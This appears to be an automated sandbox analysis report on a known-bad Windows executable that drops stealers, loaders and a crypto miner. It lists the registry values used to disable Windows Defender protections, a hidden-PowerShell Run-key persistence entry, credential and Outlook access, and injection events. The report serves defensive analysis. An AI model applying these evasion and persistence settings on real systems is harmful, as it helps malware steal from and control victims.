Analysis Overview
SHA256
b98a2ae72314e53a1dc9936278e5d5781688e343d4523b52d7659e7860672f76
Threat Level: Known bad
The file b98a2ae72314e53a1dc9936278e5d5781688e343d4523b52d7659e7860672f76 was found to be: Known bad.
Malicious Activity Summary
SmokeLoader
DcRat
Glupteba
Suspicious use of NtCreateUserProcessOtherParentProcess
RedLine payload
SectopRAT
SectopRAT payload
Raccoon
Glupteba payload
Amadey
RedLine
xmrig
Detect ZGRat V1
ZGRat
Raccoon Stealer payload
Modifies Windows Defender Real-time Protection settings
XMRig Miner payload
Modifies Windows Firewall
Blocklisted process makes network request
Downloads MZ/PE file
Stops running service(s)
Drops file in Drivers directory
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
UPX packed file
Reads user/profile data of web browsers
Windows security modification
Adds Run key to start application
Looks up external IP address via web service
Checks installed software on the system
Accesses Microsoft Outlook profiles
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Detected potential entity reuse from brand paypal.
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Checks for VirtualBox DLLs, possible anti-VM trick
Launches sc.exe
Enumerates physical storage devices
Program crash
Unsigned PE
outlook_win_path
Modifies data under HKEY_USERS
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Enumerates system info in registry
outlook_office_path
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks SCSI registry key(s)
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-31 09:44
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-31 09:44
Reported
2023-10-31 09:46
Platform
win10v2004-20231020-en
Max time kernel
91s
Max time network
154s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\b98a2ae72314e53a1dc9936278e5d5781688e343d4523b52d7659e7860672f76.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\FCE2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\FCE2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\FCE2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\FCE2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\FCE2.exe | N/A |
Raccoon
Raccoon Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1984 created 3264 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 1984 created 3264 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 1984 created 3264 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 1984 created 3264 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 1984 created 3264 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
ZGRat
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5mC4Wl2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2CFE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4C22.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\5859.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\243.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4655.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4655.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3EF1.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\FCE2.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\4C22.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\4C22.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\4C22.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\4C22.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\4C22.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\kn6Lv6zN.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\3089.exe'\"" | C:\Users\Admin\AppData\Local\Temp\3089.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\b98a2ae72314e53a1dc9936278e5d5781688e343d4523b52d7659e7860672f76.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SG3AY35.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\LG7lW98.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Sr0FS20.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\F7BE.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Si4SR7iQ.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\lU8Gt49.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ek6NX36.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\EX9zq3Ho.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\HQ2ER5na.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Detected potential entity reuse from brand paypal.
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4388 set thread context of 8 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1yK00wd9.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 2164 set thread context of 4716 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2YI9050.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 2220 set thread context of 4172 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4dS034DX.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4204 set thread context of 6252 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1cJ14rw7.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 7964 set thread context of 4656 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
| PID 3968 set thread context of 9208 | N/A | C:\Users\Admin\AppData\Local\Temp\3EF1.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\LAudioConverter\is-C309N.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-R365V.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\XML\Styles\is-ULG0N.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-2BCBP.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-EFHSB.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-IL84O.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\LAudioConverter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-OCB2A.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-F16D5.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-JVAVP.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-G1T04.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-9CRF4.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-C5M58.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\XML\Styles\is-UCU2A.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-EVC17.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\XML\Styles\is-IA9QP.tmp | C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3PH93SN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3PH93SN.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3PH93SN.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
